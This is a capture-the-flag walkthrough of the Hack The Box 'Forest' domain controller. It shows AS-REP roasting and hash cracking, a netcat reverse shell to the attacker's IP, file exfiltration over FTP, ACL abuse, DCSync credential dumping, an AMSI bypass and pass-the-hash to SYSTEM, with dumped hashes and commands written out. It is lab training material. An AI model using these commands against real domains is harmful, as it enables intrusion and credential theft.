htb-forest-nl

As usual, first an nmap scan

root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.161
Starting Nmap 7.80 (https://nmap.org ) at 2020-01-06 11:47 CET
Nmap scan report for 10.10.10.161
Host is up (0.016s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49674/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc        Microsoft Windows RPC
49682/tcp open  msrpc        Microsoft Windows RPC
49701/tcp open  msrpc        Microsoft Windows RPC
49913/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.67 seconds

There are already several interesting things in this result. First of all, this is a domain-connected system with the HTB.local domain. It has exposed kerberos, ldap and SMB services to the outside world and looks like it is a domain controller. And last but not least, a WinRM port is open. This could be an attack similar to the approach I took a long time ago for the ‘Active’ Machine on Hackthebox, combined with the winRM attack on Heist!

First let’s try enum4linux to see if I can list some more information.

root@kalivm:~/Forest# enum4linux -a 10.10.10.161
Starting enum4linux v0.8.9 
 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
---snip---
 =========================================== 
|    Getting domain SID for 10.10.10.161    |
 =========================================== 
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
---snip---
 ============================= 
|    Users on 10.10.10.161    |
 ============================= 
---snip---
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
---snip---
 ==================================================== 
|    Password Policy Information for 10.10.10.161    |
 ==================================================== 
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
    [+] HTB
    [+] Builtin
[+] Password Info for Domain: HTB
    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes 
    [+] Password Complexity Flags: 000000
        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0
    [+] Minimum password age: 1 day 4 minutes 
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
---snip---
 ============================== 
|    Groups on 10.10.10.161    |
 ============================== 
---snip---
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
---snip---
enum4linux complete on Mon Oct 21 12:05:29 2019

Enum4linux offers many interesting things. First of all I see that there are some users (sebastien, lucinda, andy, mark, santi) present and a clear service account (svc-alfresco).
Furthermore, no password complexity seems to have been enforced, which can mean easy to guess / crack passwords. There seems to be a Microsoft Exchange installation present which is commonly known as a major security vulnerability if not properly configured! And a last line confirms the prompting, Forest is actually part of the group of domain controllers! So I started browsing the impacket tools and trying several until I got to the GetNPUsers.py tool.

┌─[✗]─[puck@parrot-lt]─[~/htb/legacy/forrest]
└──╼ $python3 GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/sebastien
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

 


root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001e

After trying it for some users, I finally got a TGT for the user svc-alfresco that I could try cracking with John

┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $john forrest.hash --fork=4 -w=/opt/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads per process (8 total across 4 processes)
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB)
4 1g 0:00:00:02 DONE (2022-09-06 12:12) 0.4504g/s 460108p/s 460108c/s 460108C/s s5210523..s3r10u55
1 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 488548p/s 488548c/s 488548C/s !)KAT9aim.ie168
Waiting for 3 children to terminate
2 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 485899p/s 485899c/s 485899C/s !)!\\.abygurl69
3 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 483932p/s 483932c/s 483932C/s !)&!@!^^^%.a6_123
Session completed
┌─[puck@parrot-lt]─[~/htb/forrest]

So apparently Alfresco’s password is s3rvice. ll you have to do is get the user hash and start escalating privileges

┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir

Privilege Escalation

The next step is escalating privileges, after pressing CTRL-C too many times I decided it was time to install a simple fallback.

root@kalivm:~/Forest# ruby shell.rb
PS > mkdir sedje
PS > cd sedje
PS > IWR -uri http://10.10.15.64:8000/nc.exe -outfile nc.exe

PS > ./nc 10.10.15.64 9002 -e powershell.exe
root@kalivm:~/Forest# nc -nvlp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.10.161 50030
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\svc-alfresco\Documents\sedje>
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.ps1 -outfile SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.exe -outfile SharpHound.exe
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Invoke-BloodHound -CollectionMethod All -LDAPUser svc-alfresco -LDAPPass s3rvice
PS C:\Users\svc-alfresco\Documents\sedje> dir

    Directory: C:\Users\svc-alfresco\Documents\sedje

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/25/2019   5:20 AM          12950 20191025120253_BloodHound.zip
-a----        10/25/2019   5:20 AM           9151 Rk9SRVNU.bin
-a----        10/25/2019   5:18 AM         751616 SharpHound.exe
-a----        10/25/2019   5:17 AM         886595 SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload SharpHound.exe
Info: Uploading SharpHound.exe to C:\Users\svc-alfresco\Documents\SharpHound.exe


Data: 1402196 bytes of 1402196 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ./SharpHound.exe All
2022-09-06T03:34:37.8848043-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2022-09-06T03:34:38.2441827-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-09-06T03:34:38.3847964-07:00|INFORMATION|Initializing SharpHound at 3:34 AM on 9/6/2022
2022-09-06T03:34:39.6035545-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-09-06T03:34:40.9785510-07:00|INFORMATION|Beginning LDAP search for htb.local
2022-09-06T03:34:41.4004375-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-09-06T03:34:41.4004375-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-09-06T03:35:11.4786322-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 47 MB RAM
2022-09-06T03:35:25.5255232-07:00|INFORMATION|Consumers finished, closing output channel
2022-09-06T03:35:25.5567715-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-09-06T03:35:25.6661470-07:00|INFORMATION|Status: 161 objects finished (+161 3.659091)/s -- Using 49 MB RAM
2022-09-06T03:35:25.6661470-07:00|INFORMATION|Enumeration finished in 00:00:44.7682293
2022-09-06T03:35:25.7442762-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
117 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2022-09-06T03:35:25.7442762-07:00|INFORMATION|SharpHound Enumeration Completed at 3:35 AM on 9/6/2022! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir


Directory: C:\Users\svc-alfresco\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/6/2022 3:35 AM 18873 20220906033525_BloodHound.zip
-a---- 9/6/2022 3:35 AM 19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 9/6/2022 3:29 AM 1051648 SharpHound.exe


*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20220906033525_BloodHound.zip
Info: Downloading 20220906033525_BloodHound.zip to ./20220906033525_BloodHound.zip


Info: Download successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

After the SharpHound script and binary file are transferred, I run them with the user svc-alfresco and the script provides a zip file with all relevant domain data. All that remains is to transfer the file to my local machine and analyze it with BloodHound. The easiest and most used way I learned during my OSCP journey was to easily create and run an FTP script.

PS C:\Users\svc-alfresco\Documents\sedje> echo "open 10.10.15.64" > ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "anonymous" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "put 20191101052032_BloodHound.zip" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "quit" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> ftp -s:ftp 
open 10.10.15.64
Log in with USER and PASS first.
User (10.10.15.64:(none)): 
put 20191025120253_BloodHound.zip
quit

Of course, this approach requires an active FTP server on my attacker, which can be easily done with Python

root@kalivm:~/Forest# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2019-10-25 13:15:13] >>> starting FTP server on 0.0.0.0:21, pid=5057 < <<
[I 2019-10-25 13:15:13] concurrency model: async
[I 2019-10-25 13:15:13] masquerade (NAT) address: None
[I 2019-10-25 13:15:13] passive ports: None
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[] FTP session opened (connect)
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] USER 'anonymous' logged in.
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] STOR /root/Documents/htb/Machines/Forest/20191025120253_BloodHound.zip completed=1 bytes=12950 seconds=0.07
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] FTP session closed (disconnect).

Thus, the file has been successfully transferred and can be loaded directly into BloodHound by simply dragging and dropping.

In the “bloodhound overview” of the shortest path to domain manager, I see that a user who is part of the ‘Exchange Windows permissions’ group has the ability to write the ACL of the entire HTB.Local domain, for example the Password hashes. I can also see that the svc-alfresco user has GenericAll permissions for that particular group through their delegated memberships of `Service Accounts`,` Privileged IT Accounts` and `Account Operators`.
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/PowerView.ps1 -outfile Powerview.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\PowerView.ps1
PS C:\Users\svc-alfresco\Documents\sedje> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
PS C:\Users\svc-alfresco\Documents\sedje> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
PS C:\Users\svc-alfresco\Documents\sedje> New-DomainUser -SamAccountName sedje -AccountPassword $SecPassword -Credential $Cred | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $Cred

When you add the svc alfresco account to the ‘Exchange Windows Permissions’ group, it will be deleted again after a few minutes, which is quite a pain. So I decide to add my own user to the domain with the same password as user svc-alfresco and add to the group `Exchange Windows permissions`. However, after that, I lingered for a long time due to the very specific syntax and switches required (and available) with the impacket tools. If some Discord users had not helped me, I would probably have given up in the end, so I have to thank them for pushing them in the next step!

root@kalivm:~/Forest# ntlmrelayx.py --escalate-user sedje -t ldap://10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections

Now all I have to do is browse to the localhost connection and provide valid credentials, NTLMRelay will do all the hard work and change the permissions for me.I open a browser for localhost and provide the sedje credentials.

[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap://10.10.10.161 as \sedje SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User sedje now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20191025-135738.restoresedsedss

And ntlmrelayx.py already tells me what to do, sedje now has proper permissions to continue secretsdump.py.

root@kalivm:~/Forest# secretsdump.py htb/sedje:s3rvice@10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
---snip---

Use secretsdump.py to get all the hashes in the domain

root@kalivm:~/Forest# psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@10.10.10.161 powershell.exe
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file ezaVoayr.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service CAke on 10.10.10.161.....
[*] Starting service CAke.....
[!] Press help for extra shell commands
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
f048153f202bbb2f82622b04d79129cc

….

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user puck abc123! /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" puck /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" puck /add


The command completed successfully.

.

 

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
Info: Uploading PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1


Data: 1027036 bytes of 1027036 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . ./PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> menu

,. ( . ) " ,. ( . ) . 
(" ( ) )' ,' ( ' (" ) )' ,' . ,) 
.; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )(( 
_".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _') 
\_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \ 
| __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \ 
| \\ /| | |__ /_____/ \ /| | | \ | \/ Y \
/_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ /
\/ \/ \/ \/ \/

By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Add-DomainGroupMember 
[+] Add-DomainObjectAcl 
[+] Add-RemoteConnection 
[+] Add-Win32Type 
[+] Convert-ADName 
[+] Convert-DNSRecord 
[+] ConvertFrom-LDAPLogonHours 
[+] ConvertFrom-SID 
[+] ConvertFrom-UACValue 
[+] Convert-LDAPProperty 
[+] ConvertTo-SID 
[+] Dll-Loader 
[+] Donut-Loader 
[+] Export-PowerViewCSV 
[+] field 
[+] Find-DomainLocalGroupMember 
[+] Find-DomainObjectPropertyOutlier 
[+] Find-DomainProcess 
[+] Find-DomainShare 
[+] Find-DomainUserEvent 
[+] Find-DomainUserLocation 
[+] Find-InterestingDomainAcl 
[+] Find-InterestingDomainShareFile 
[+] Find-InterestingFile 
[+] Find-LocalAdminAccess 
[+] func 
[+] Get-Domain 
[+] Get-DomainComputer 
[+] Get-DomainController 
[+] Get-DomainDFSShare 
[+] Get-DomainDNSRecord 
[+] Get-DomainDNSZone 
[+] Get-DomainFileServer 
[+] Get-DomainForeignGroupMember 
[+] Get-DomainForeignUser 
[+] Get-DomainGPO 
[+] Get-DomainGPOComputerLocalGroupMapping 
[+] Get-DomainGPOLocalGroup 
[+] Get-DomainGPOUserLocalGroupMapping 
[+] Get-DomainGroup 
[+] Get-DomainGroupMember 
[+] Get-DomainGroupMemberDeleted 
[+] Get-DomainGUIDMap 
[+] Get-DomainManagedSecurityGroup 
[+] Get-DomainObject 
[+] Get-DomainObjectAcl 
[+] Get-DomainObjectAttributeHistory 
[+] Get-DomainObjectLinkedAttributeHistory 
[+] Get-DomainOU 
[+] Get-DomainPolicyData 
[+] Get-DomainSearcher 
[+] Get-DomainSID 
[+] Get-DomainSite 
[+] Get-DomainSPNTicket 
[+] Get-DomainSubnet 
[+] Get-DomainTrust 
[+] Get-DomainTrustMapping 
[+] Get-DomainUser 
[+] Get-DomainUserEvent 
[+] Get-Forest 
[+] Get-ForestDomain 
[+] Get-ForestGlobalCatalog 
[+] Get-ForestSchemaClass 
[+] Get-ForestTrust 
[+] Get-GPODelegation 
[+] Get-GptTmpl 
[+] Get-GroupsXML 
[+] Get-IniContent 
[+] Get-NetComputerSiteName 
[+] Get-NetLocalGroup 
[+] Get-NetLocalGroupMember 
[+] Get-NetLoggedon 
[+] Get-NetRDPSession 
[+] Get-NetSession 
[+] Get-NetShare 
[+] Get-PathAcl 
[+] Get-PrincipalContext 
[+] Get-RegLoggedOn 
[+] Get-WMIProcess 
[+] Get-WMIRegCachedRDPConnection 
[+] Get-WMIRegLastLoggedOn 
[+] Get-WMIRegMountedDrive 
[+] Get-WMIRegProxy 
[+] Invoke-Binary 
[+] Invoke-Kerberoast 
[+] Invoke-RevertToSelf 
[+] Invoke-UserImpersonation 
[+] New-ADObjectAccessControlEntry 
[+] New-DomainGroup 
[+] New-DomainUser 
[+] New-DynamicParameter 
[+] New-InMemoryModule 
[+] New-ThreadedFunction 
[+] psenum 
[+] Remove-DomainGroupMember 
[+] Remove-DomainObjectAcl 
[+] Remove-RemoteConnection 
[+] Resolve-IPAddress 
[+] Set-DomainObject 
[+] Set-DomainObjectOwner 
[+] Set-DomainUserPassword 
[+] struct 
[+] Test-AdminAccess
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Bypass-4MSI

Info: Patching 4MSI, please be patient...

[+] Success!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'abc123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb\puck', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity puck -Credential $cred -Rights DCSync

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

.

┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $python3 secretsdump.py htb/puck@10.10.10.161
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:abc123!
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
